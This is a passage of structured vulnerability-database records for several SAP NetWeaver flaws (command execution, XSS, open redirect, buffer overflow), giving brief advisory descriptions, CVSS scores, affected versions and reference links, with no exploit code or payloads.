"date": "2018-01-09T15:29:00.370000",
"db": "NVD",
"id": "CVE-2018-2363"
},
{
"date": "2018-01-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201801-344"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-01-09T00:00:00",
"db": "BID",
"id": "102449"
},
{
"date": "2018-02-09T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-001368"
},
{
"date": "2018-01-29T13:04:27.527000",
"db": "NVD",
"id": "CVE-2018-2363"
},
{
"date": "2018-01-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201801-344"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201801-344"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Code injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-001368"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201801-344"
}
],
"trust": 0.6
}
}
var-201311-0406
Vulnerability from variot
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. SAP NetWeaver Portal has a vulnerability in handling GET requests sent through ConfigServlet, allowing remote attackers to execute arbitrary operating system commands using specially crafted requests
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201311-0406",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": null,
"trust": 0.6,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.2,
"vendor": "sap",
"version": "*"
}
],
"sources": [
{
"db": "IVD",
"id": "8ef25ada-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14595"
}
]
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2013-14595",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "IVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "8ef25ada-1efc-11e6-abef-000c29c66e3d",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.2,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.9 [IVD]"
}
],
"cvssV3": [],
"severity": [
{
"author": "CNVD",
"id": "CNVD-2013-14595",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "IVD",
"id": "8ef25ada-1efc-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "8ef25ada-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14595"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. SAP NetWeaver Portal has a vulnerability in handling GET requests sent through ConfigServlet, allowing remote attackers to execute arbitrary operating system commands using specially crafted requests",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14595"
},
{
"db": "IVD",
"id": "8ef25ada-1efc-11e6-abef-000c29c66e3d"
}
],
"trust": 0.72
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-14595",
"trust": 0.8
},
{
"db": "EXPLOITDB",
"id": "24963",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "24963",
"trust": 0.6
},
{
"db": "OSVDB",
"id": "92704",
"trust": 0.6
},
{
"db": "IVD",
"id": "8EF25ADA-1EFC-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "8ef25ada-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14595"
}
]
},
"id": "VAR-201311-0406",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "8ef25ada-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14595"
}
],
"trust": 1.06917922
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "8ef25ada-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14595"
}
]
},
"last_update_date": "2022-05-17T02:07:14.175000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://www.exploit-db.com/exploits/24963/"
},
{
"trust": 0.6,
"url": "http://osvdb.org/show/osvdb/92704"
},
{
"trust": 0.6,
"url": "https://service.sap.com/sap/support/notes/1445998"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-14595"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "8ef25ada-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14595"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-11-22T00:00:00",
"db": "IVD",
"id": "8ef25ada-1efc-11e6-abef-000c29c66e3d"
},
{
"date": "2013-11-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-14595"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-11-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-14595"
}
]
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Remote code execution vulnerability",
"sources": [
{
"db": "IVD",
"id": "8ef25ada-1efc-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2013-14595"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Code injection",
"sources": [
{
"db": "IVD",
"id": "8ef25ada-1efc-11e6-abef-000c29c66e3d"
}
],
"trust": 0.2
}
}
var-202306-1318
Vulnerability from variot
SAP NetWeaver Enterprise Portal - version 7.50, does not sufficiently encode user-controlled inputs over the network, resulting in reflected Cross-Site Scripting (XSS) vulnerability, therefore changing the scope of the attack. On successful exploitation, an attacker can view or modify information causing a limited impact on confidentiality and integrity of the application.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202306-1318",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.0,
"vendor": "sap",
"version": "7.50"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-33985"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.50:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-33985"
}
]
},
"cve": "CVE-2023-33985",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 2.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2023-33985",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "cna@sap.com",
"id": "CVE-2023-33985",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202306-859",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-33985"
},
{
"db": "NVD",
"id": "CVE-2023-33985"
},
{
"db": "CNNVD",
"id": "CNNVD-202306-859"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Enterprise Portal - version 7.50, does not sufficiently encode user-controlled inputs over the network, resulting in reflected Cross-Site Scripting (XSS) vulnerability, therefore changing the scope of the attack. On successful exploitation, an attacker can view or modify information causing a limited impact on confidentiality and integrity of the application.\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-33985"
}
],
"trust": 1.0
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-33985",
"trust": 1.6
},
{
"db": "CNNVD",
"id": "CNNVD-202306-859",
"trust": 0.6
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-33985"
},
{
"db": "CNNVD",
"id": "CNNVD-202306-859"
}
]
},
"id": "VAR-202306-1318",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T12:47:57.813000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP NetWeaver Enterprise Portal Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=242371"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202306-859"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-33985"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "https://launchpad.support.sap.com/#/notes/3331627"
},
{
"trust": 1.6,
"url": "https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2023-33985/"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-33985"
},
{
"db": "CNNVD",
"id": "CNNVD-202306-859"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-33985"
},
{
"db": "CNNVD",
"id": "CNNVD-202306-859"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-06-13T03:15:09.667000",
"db": "NVD",
"id": "CVE-2023-33985"
},
{
"date": "2023-06-13T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202306-859"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-06-20T19:27:12.497000",
"db": "NVD",
"id": "CVE-2023-33985"
},
{
"date": "2023-06-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202306-859"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202306-859"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Enterprise Portal Cross-site scripting vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202306-859"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202306-859"
}
],
"trust": 0.6
}
}
var-201709-1269
Vulnerability from variot
SAP NetWeaver is prone to open-redirection vulnerability An attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-1269",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "100909"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "100909"
}
],
"trust": 0.3
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is prone to open-redirection vulnerability\nAn attacker can leverage this issue by constructing a crafted URI and enticing a user to follow it. When an unsuspecting victim follows the link, they may be redirected to an attacker-controlled site; this may aid in phishing attacks. Other attacks are possible.",
"sources": [
{
"db": "BID",
"id": "100909"
}
],
"trust": 0.3
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "100909",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "100909"
}
]
},
"id": "VAR-201709-1269",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.26917922
},
"last_update_date": "2022-05-17T02:04:30.743000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.3,
"url": "http://www.sap.com/"
},
{
"trust": 0.3,
"url": "https://launchpad.support.sap.com/#/notes/2423540"
},
{
"trust": 0.3,
"url": "https://blogs.sap.com/2017/09/12/sap-security-patch-day-september-2017/"
}
],
"sources": [
{
"db": "BID",
"id": "100909"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "100909"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-09-12T00:00:00",
"db": "BID",
"id": "100909"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-09-12T00:00:00",
"db": "BID",
"id": "100909"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "100909"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Open Redirection Vulnerability",
"sources": [
{
"db": "BID",
"id": "100909"
}
],
"trust": 0.3
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "100909"
}
],
"trust": 0.3
}
}
var-201409-0531
Vulnerability from variot
Buffer overflow in disp+work.exe 7000.52.12.34966 and 7200.117.19.50294 in the Dispatcher in SAP NetWeaver 7.00 and 7.20 allows remote authenticated users to cause a denial of service or execute arbitrary code via unspecified vectors. SAP NetWeaver is the technical foundation of SAP's integrated technology platform and all SAP applications since SAP Business Suite. A buffer overflow vulnerability exists in SAP NetWeaver 'disp+work.exe'. Failed exploit attempts may result in a denial-of-service condition
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201409-0531",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.9,
"vendor": "sap",
"version": "7.20"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.9,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.00 (disp+work.exe 7000.52.12.34966)"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.20 (disp+work.exe 7200.117.19.50294)"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.6,
"vendor": "sap",
"version": "7.x"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "netweaver",
"version": "7.0"
},
{
"model": null,
"scope": "eq",
"trust": 0.2,
"vendor": "netweaver",
"version": "7.20"
}
],
"sources": [
{
"db": "IVD",
"id": "fbaaf204-1ec0-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2014-05482"
},
{
"db": "BID",
"id": "69657"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-004060"
},
{
"db": "NVD",
"id": "CVE-2014-6252"
},
{
"db": "CNNVD",
"id": "CNNVD-201409-049"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
